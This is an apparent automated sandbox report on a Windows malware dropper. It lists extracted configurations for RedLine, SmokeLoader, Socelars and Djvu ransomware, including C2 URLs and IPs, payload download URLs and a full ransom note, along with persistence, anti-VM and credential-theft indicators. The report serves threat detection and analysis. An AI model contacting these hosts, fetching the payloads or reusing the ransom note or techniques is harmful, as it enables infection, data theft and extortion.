Analysis
-
max time kernel
147s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
12-03-2022 19:40
Static task
static1
Behavioral task
behavioral1
Sample
7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
Resource
win10v2004-en-20220113
General
-
Target
7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe
-
Size
4.0MB
-
MD5
8dcf7d03311c30ff6902530f95f77b36
-
SHA1
b5f441c49823cbd4f253163d233452927df777d8
-
SHA256
7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135
-
SHA512
7b605bef4c177406606f6abb4baf1781525aa150b5dab8b129bd52fdc6f4f485cea589fe93161d4c353c947fe2214ea84b1329d5212c73e410fccbe20f4cf6b4
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
ruzki12_03
176.122.23.55:11768
-
auth_value
c51ddc8008e8581a01cec6e8291c5530
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn
Extracted
redline
ruzkida
185.11.73.55:22201
-
auth_value
000938fe0d697ca6a3b6cee46ba02ff3
Signatures
-
Detected Djvu ransomware 4 IoCs
Processes:
resource yara_rule behavioral2/memory/6400-312-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/6400-350-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/6400-352-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/6400-356-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/5548-244-0x0000000000640000-0x0000000000790000-memory.dmp family_redline behavioral2/memory/5548-256-0x0000000000640000-0x0000000000790000-memory.dmp family_redline behavioral2/memory/5548-257-0x0000000000640000-0x0000000000790000-memory.dmp family_redline behavioral2/memory/5548-265-0x0000000000640000-0x0000000000790000-memory.dmp family_redline behavioral2/memory/5548-295-0x0000000000640000-0x0000000000790000-memory.dmp family_redline behavioral2/memory/6380-311-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/6192-332-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
OnlyLogger Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3320-156-0x0000000000AE0000-0x0000000000B10000-memory.dmp family_onlylogger behavioral2/memory/3320-157-0x0000000000400000-0x00000000009C0000-memory.dmp family_onlylogger behavioral2/memory/5688-279-0x0000000000610000-0x0000000000654000-memory.dmp family_onlylogger -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.EXErundll32.exeflow pid process 250 5308 powershell.EXE 253 5308 powershell.EXE 261 5308 powershell.EXE 266 6148 rundll32.exe 270 6148 rundll32.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 48 IoCs
Processes:
Files.exeInstall.exeKRSetp.exejg3_3uag.exeFile.exeFolder.exeInstallation.exepzyh.exepub2.exeInfo.exejfiag3g_gg.exejfiag3g_gg.exeRK_4rgTt5CcW3iNxDT6xO9bL.exeLuC7opz56ZHv9DMKAzniWXla.exeRxWV8a03ZV04XB88tc2CXbRj.exeGzkt5mHpxF1v1F6ko7n6Ojln.exepowershell.EXE8yNuAlksxt9ERCQBLnTf5R7s.exe3C5chxgmdIM7FCOvWctXQCVO.exeftGHhdmXOThAq7aPthuyzF9H.exePGrgYrmjIUuPTUnxq9jnhp_9.exeHxMqtYZIUVTsFBvCoEA3Pki_.exefind.exethSjL5N0VAxIgAXhHP6f09aM.exeZQfEwTalmYFjc4TLiZPAYIzG.exeQwtjZdfAu0PgtINFi4Nvj66n.exelx0psHagf6RnnGkhZ0Fowal4.exeAMmh7Hp1kuB7JaUBXLLtucDo.exezhD7lRTUvJmwo8erfpdnVTWv.exe4E1sEd5y60BTJLCX9pPJHvn6.exek3wOXzGlwzQprfZ7dKwqK6sN.exeaE5gGpDGF09P287uBSM8LvUs.exeOXTwCzYYERQoTolMsvuosWem.exez63VCPkRi8gB3YlO5uw17UaM.exe34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exeInstall.exezhD7lRTUvJmwo8erfpdnVTWv.exelx0psHagf6RnnGkhZ0Fowal4.exeInstall.exedada.exedada.exebuild.exebuild.exebkkimcju.exeirrptjqb.exeAccostarmi.exe.pifLxjwaytgkwrfchptbandzip.exeMoUSO.exepid process 2556 Files.exe 3320 Install.exe 5004 KRSetp.exe 4468 jg3_3uag.exe 1964 File.exe 1880 Folder.exe 4932 Installation.exe 4864 pzyh.exe 1252 pub2.exe 4708 Info.exe 3364 jfiag3g_gg.exe 5060 jfiag3g_gg.exe 5140 RK_4rgTt5CcW3iNxDT6xO9bL.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5212 RxWV8a03ZV04XB88tc2CXbRj.exe 5252 Gzkt5mHpxF1v1F6ko7n6Ojln.exe 5308 powershell.EXE 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5408 3C5chxgmdIM7FCOvWctXQCVO.exe 5504 ftGHhdmXOThAq7aPthuyzF9H.exe 5520 PGrgYrmjIUuPTUnxq9jnhp_9.exe 5512 HxMqtYZIUVTsFBvCoEA3Pki_.exe 5532 find.exe 5548 thSjL5N0VAxIgAXhHP6f09aM.exe 5536 ZQfEwTalmYFjc4TLiZPAYIzG.exe 5600 QwtjZdfAu0PgtINFi4Nvj66n.exe 5640 lx0psHagf6RnnGkhZ0Fowal4.exe 5648 AMmh7Hp1kuB7JaUBXLLtucDo.exe 5672 zhD7lRTUvJmwo8erfpdnVTWv.exe 5680 4E1sEd5y60BTJLCX9pPJHvn6.exe 5688 k3wOXzGlwzQprfZ7dKwqK6sN.exe 5696 aE5gGpDGF09P287uBSM8LvUs.exe 5704 OXTwCzYYERQoTolMsvuosWem.exe 5720 z63VCPkRi8gB3YlO5uw17UaM.exe 3936 34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe 6264 Install.exe 6400 zhD7lRTUvJmwo8erfpdnVTWv.exe 6192 lx0psHagf6RnnGkhZ0Fowal4.exe 5188 Install.exe 5832 dada.exe 6140 dada.exe 2328 build.exe 2456 build.exe 5208 bkkimcju.exe 7024 irrptjqb.exe 224 Accostarmi.exe.pif 6912 Lxjwaytgkwrfchptbandzip.exe 4428 MoUSO.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect behavioral2/memory/4468-142-0x0000000000400000-0x0000000000651000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exePGrgYrmjIUuPTUnxq9jnhp_9.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PGrgYrmjIUuPTUnxq9jnhp_9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PGrgYrmjIUuPTUnxq9jnhp_9.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ZQfEwTalmYFjc4TLiZPAYIzG.exeGzkt5mHpxF1v1F6ko7n6Ojln.exeOXTwCzYYERQoTolMsvuosWem.exe7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exeInfo.exebuild.exeFolder.exeftGHhdmXOThAq7aPthuyzF9H.exeRxWV8a03ZV04XB88tc2CXbRj.exebkkimcju.exeInstall.exek3wOXzGlwzQprfZ7dKwqK6sN.exeFiles.exeRK_4rgTt5CcW3iNxDT6xO9bL.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation ZQfEwTalmYFjc4TLiZPAYIzG.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Gzkt5mHpxF1v1F6ko7n6Ojln.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation OXTwCzYYERQoTolMsvuosWem.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 7d833f03931de8957a7c6bc932b6ccc7984e377fa98b59e631a73b86b83af135.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Info.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation build.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation ftGHhdmXOThAq7aPthuyzF9H.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation RxWV8a03ZV04XB88tc2CXbRj.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation bkkimcju.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation k3wOXzGlwzQprfZ7dKwqK6sN.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Files.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation RK_4rgTt5CcW3iNxDT6xO9bL.exe -
Loads dropped DLL 24 IoCs
Processes:
pub2.exerUNdlL32.eXeLuC7opz56ZHv9DMKAzniWXla.exe8yNuAlksxt9ERCQBLnTf5R7s.exepowershell.EXEpid process 1252 pub2.exe 3340 rUNdlL32.eXe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5148 LuC7opz56ZHv9DMKAzniWXla.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5316 8yNuAlksxt9ERCQBLnTf5R7s.exe 5308 powershell.EXE 5308 powershell.EXE -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
pzyh.exemsedge.exeRxWV8a03ZV04XB88tc2CXbRj.exeftGHhdmXOThAq7aPthuyzF9H.exeOXTwCzYYERQoTolMsvuosWem.exeZQfEwTalmYFjc4TLiZPAYIzG.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\RxWV8a03ZV04XB88tc2CXbRj.exe" RxWV8a03ZV04XB88tc2CXbRj.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dada = "C:\\Users\\Admin\\Documents\\ftGHhdmXOThAq7aPthuyzF9H.exe" ftGHhdmXOThAq7aPthuyzF9H.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unyridm = "\"C:\\Users\\Admin\\bkkimcju.exe\"" OXTwCzYYERQoTolMsvuosWem.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mzqdjnr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lmeurft\\Mzqdjnr.exe\"" ZQfEwTalmYFjc4TLiZPAYIzG.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
PGrgYrmjIUuPTUnxq9jnhp_9.exejg3_3uag.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PGrgYrmjIUuPTUnxq9jnhp_9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg3_3uag.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 230 ipinfo.io 232 ipinfo.io 239 ipinfo.io 240 ipinfo.io 14 ip-api.com 18 ipinfo.io 19 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
thSjL5N0VAxIgAXhHP6f09aM.exeAMmh7Hp1kuB7JaUBXLLtucDo.exepid process 5548 thSjL5N0VAxIgAXhHP6f09aM.exe 5648 AMmh7Hp1kuB7JaUBXLLtucDo.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
zhD7lRTUvJmwo8erfpdnVTWv.exePGrgYrmjIUuPTUnxq9jnhp_9.exelx0psHagf6RnnGkhZ0Fowal4.exeirrptjqb.exeZQfEwTalmYFjc4TLiZPAYIzG.exedescription pid process target process PID 5672 set thread context of 6400 5672 zhD7lRTUvJmwo8erfpdnVTWv.exe zhD7lRTUvJmwo8erfpdnVTWv.exe PID 5520 set thread context of 6380 5520 PGrgYrmjIUuPTUnxq9jnhp_9.exe AppLaunch.exe PID 5640 set thread context of 6192 5640 lx0psHagf6RnnGkhZ0Fowal4.exe lx0psHagf6RnnGkhZ0Fowal4.exe PID 7024 set thread context of 2160 7024 irrptjqb.exe svchost.exe PID 5536 set thread context of 6908 5536 ZQfEwTalmYFjc4TLiZPAYIzG.exe MSBuild.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220312194133.pma setup.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\08a81096-2458-4d09-bc32-1cdd20f508f6.tmp setup.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2920 3320 WerFault.exe Install.exe 944 3340 WerFault.exe rUNdlL32.eXe 1568 3320 WerFault.exe Install.exe 3228 3320 WerFault.exe Install.exe 3316 3320 WerFault.exe Install.exe 4064 3320 WerFault.exe Install.exe 3840 3320 WerFault.exe Install.exe 3392 3320 WerFault.exe Install.exe 4796 3320 WerFault.exe Install.exe 4948 5532 WerFault.exe gcZHL1UuAAZsKYs16SSxBhPd.exe 4672 5680 WerFault.exe 4E1sEd5y60BTJLCX9pPJHvn6.exe 6248 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 6164 5720 WerFault.exe z63VCPkRi8gB3YlO5uw17UaM.exe 6936 5532 WerFault.exe gcZHL1UuAAZsKYs16SSxBhPd.exe 6364 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 6436 5720 WerFault.exe z63VCPkRi8gB3YlO5uw17UaM.exe 6444 5680 WerFault.exe 4E1sEd5y60BTJLCX9pPJHvn6.exe 6892 5704 WerFault.exe OXTwCzYYERQoTolMsvuosWem.exe 6832 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 400 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 6528 5208 WerFault.exe bkkimcju.exe 4948 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 6436 5408 WerFault.exe 3C5chxgmdIM7FCOvWctXQCVO.exe 6888 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 6656 5408 WerFault.exe 3C5chxgmdIM7FCOvWctXQCVO.exe 4916 7024 WerFault.exe irrptjqb.exe 6348 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 2788 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 2500 5688 WerFault.exe k3wOXzGlwzQprfZ7dKwqK6sN.exe 5676 3320 WerFault.exe Install.exe 7140 3320 WerFault.exe Install.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Lxjwaytgkwrfchptbandzip.exepub2.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Lxjwaytgkwrfchptbandzip.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Lxjwaytgkwrfchptbandzip.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Lxjwaytgkwrfchptbandzip.exe -
Checks processor information in registry 2 TTPs 27 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
3C5chxgmdIM7FCOvWctXQCVO.exe8yNuAlksxt9ERCQBLnTf5R7s.exe34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exepowershell.EXELuC7opz56ZHv9DMKAzniWXla.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 3C5chxgmdIM7FCOvWctXQCVO.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 3C5chxgmdIM7FCOvWctXQCVO.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8yNuAlksxt9ERCQBLnTf5R7s.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3C5chxgmdIM7FCOvWctXQCVO.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 powershell.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision 3C5chxgmdIM7FCOvWctXQCVO.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 LuC7opz56ZHv9DMKAzniWXla.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3C5chxgmdIM7FCOvWctXQCVO.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 34f5381b-d2d7-48b4-8af3-8b6f13b8fbaf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data 3C5chxgmdIM7FCOvWctXQCVO.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 3C5chxgmdIM7FCOvWctXQCVO.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 3C5chxgmdIM7FCOvWctXQCVO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString LuC7opz56ZHv9DMKAzniWXla.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8yNuAlksxt9ERCQBLnTf5R7s.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 5224 schtasks.exe 3404 schtasks.exe 944 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5508 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 1160 tasklist.exe 6336 tasklist.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
msedge.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1072 taskkill.exe 5336 taskkill.exe 1924 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
msedge.exeFolder.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Folder.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
